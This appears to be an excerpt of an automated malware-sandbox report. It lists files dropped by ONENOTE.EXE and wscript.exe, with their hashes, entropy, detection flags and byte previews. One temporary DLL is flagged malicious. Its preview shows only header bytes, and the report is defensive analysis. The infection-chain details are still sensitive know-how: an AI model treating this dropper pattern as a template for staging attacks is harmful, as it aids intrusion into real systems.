                                                                                                  MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                  SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                  SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                  SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                  Malicious:true
                                                                                                  Preview:badum tss

                                                                                                  C:\Users\user\AppData\Local\Temp\rad04F81.tmp.dll

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                  File Type:HTML document, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):381
                                                                                                  Entropy (8bit):5.035593451835013
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:pn0+Dy9xwq8B0hEr6VHB0SpMAcg/EzBoAuZ2A3b1AYDAJgXPUhA1QCV2AmWZW5Kk:J0+oxb8ShRZSS146Ai2A3JAhSPEAr1mP
                                                                                                  MD5:118A489422BE0C5CA0CECF3BB7903C7E
                                                                                                  SHA1:B90AF089FD0E728E61D532BE80062AED39D98978
                                                                                                  SHA-256:FF6D14F77E27F7B90CB2F20BCE408189F5F388961F3FCD13FE2DF2CC0A002DC3
                                                                                                  SHA-512:283CD22F52BCCB8DD22A8772E8121302A6975F2DE35540122F1F7B38953F0BB015831999733884686C1A9019034D2CC113F81245F53B84EDD02B8ADB94638D40
                                                                                                  Malicious:false
                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>401 Unauthorized</title>.</head><body>.<h1>Unauthorized</h1>.<p>This server could not verify that you.are authorized to access the document.requested. Either you supplied the wrong.credentials (e.g., bad password), or your.browser doesn't understand how to supply.the credentials required.</p>.</body></html>.

                                                                                                  C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):574976
                                                                                                  Entropy (8bit):7.0854686935842075
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:chQZR06Fy1F5YqSDZ9ma2aCStos1F3uD2Hescq2mc:jT08y1F5YqSDZ9ma21Str3cTX
                                                                                                  MD5:C901C8089C5E017F8E9B4B15C8EF154F
                                                                                                  SHA1:336C2BEA43BFA2E8AFD27A164DBA640F36C0013C
                                                                                                  SHA-256:FD79E8FA5E3801101A1305B6ABA7A5E7FDC852ED9036D6D9A5210BE414A5CC5A
                                                                                                  SHA-512:9FF052F9FC9CC3CF74B170F76D6A20A01C5DBB74B2D97EDC9E55B75F52B408F3104E49BF290773BD63D216F2787D945AA7D954B58E927C99E1DB18C6A7D74ADE
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1D".u%L.u%L.u%L.....p%L......%L.....x%L...7.w%L.'MI.i%L.'MH.|%L.'MO.s%L.|]..r%L.u%M..%L..LE.q%L..LL.t%L..L..t%L.u%..t%L..LN.t%L.Richu%L.........PE..d......d.........." .........N............................................... ............ .........................................0...........d....P..`........C...................C..............................0C..................0............................text.../........................... ..`.rdata...&.......(..................@..@.data...d'..........................@....pdata...C.......D..................@..@.rsrc...`....P......................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\{022C9FF8-D0F4-45A4-BEB3-4C3502113F39}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1873
                                                                                                  Entropy (8bit):7.534961703340853
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                  MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                  SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                  SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                  SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

                                                                                                  C:\Users\user\AppData\Local\Temp\{02BB056D-6DC7-4CC9-A901-FCACBE062B20}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):53259
                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                  C:\Users\user\AppData\Local\Temp\{0312A4F2-477E-4FA8-A0C4-C0266FBCB03A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Temp\{04EC4706-9739-4FE5-A631-B018AACC6EB4}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{05AAB5F1-1F00-43DB-95FC-BEF2822A1A83}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22203
                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                  C:\Users\user\AppData\Local\Temp\{05B93411-5977-44A8-9215-975683FABB0F}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Temp\{06315C72-EB48-4CA8-BBED-F8122FCE2EBD}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3555
                                                                                                  Entropy (8bit):7.686253071499049
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                  MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                  SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                  SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                  SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

                                                                                                  C:\Users\user\AppData\Local\Temp\{0946E3C5-105C-4105-AF2E-DB5B3967E456}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Temp\{09493205-3DA1-44FA-AB1E-C23BD04C74B4}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Temp\{0D0A6C9B-20C7-4880-9182-E9997640D471}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65589
                                                                                                  Entropy (8bit):7.960181939300061
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                  MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                  SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                  SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                  SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

                                                                                                  C:\Users\user\AppData\Local\Temp\{0F1831E0-F2F1-482C-978F-8FD2E9CE7BE5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Temp\{0FE253AE-DF86-4071-B97F-E057FEB65752}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
